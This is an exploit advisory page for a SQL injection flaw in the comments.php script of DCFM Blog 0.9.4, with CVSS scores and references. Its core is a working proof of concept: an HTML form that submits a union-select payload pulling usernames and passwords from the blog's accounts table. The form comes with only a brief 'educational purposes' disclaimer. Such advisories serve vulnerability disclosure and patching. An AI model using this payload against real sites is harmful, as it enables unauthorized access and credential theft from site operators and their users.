DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability

2008.06.14
Credit: unohope
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

_____ _ _ _____ _____ _____ _____ / ___| |_| | _ \| _ | _ |_ _| | (___| _ | [_)_/| (_) | (_) | | | \_____|_| |_|_| |_||_____|_____| |_| C. H. R. O. O. T. SECURITY GROUP - -- ----- --- -- -- ---- --- -- - http://www.chroot.org _ _ _ _____ ____ ____ __ _ Hacks In Taiwan | |_| | |_ _| __| | \| | Conference 2008 | _ | | | | | (__| () | | |_| |_|_| |_| \____|____|_|\__| http://www.hitcon.org Title =======:: DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability Author ======:: unohope [at] chroot [dot] org IRC =========:: irc.chroot.org #chroot ScriptName ==:: DCFM Blog Download ====:: http://nchc.dl.sourceforge.net/sourceforge/dcfm-blog/blog_files_0-9-4.zi p Mirror ======:: http://www.badongo.com/file/9630703 ______________________ [SQL Injection] - {comments.php} - <form action="http://localhost/dcfmblog/comments.php" method="post"> <input type="text" name="id" size=50 value="-99' union select 0,username,password from accounts where id=1/*"> <input type="submit" value=" send "> </form> ______ [NOTE] !! This is just for educational purposes, DO NOT use for illegal. !!

References:

http://www.securityfocus.com/bid/29627
http://www.securityfocus.com/archive/1/archive/1/493220/100/0/threaded
http://www.milw0rm.com/exploits/5772
http://chroot.org/exploits/chroot_uu_008


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top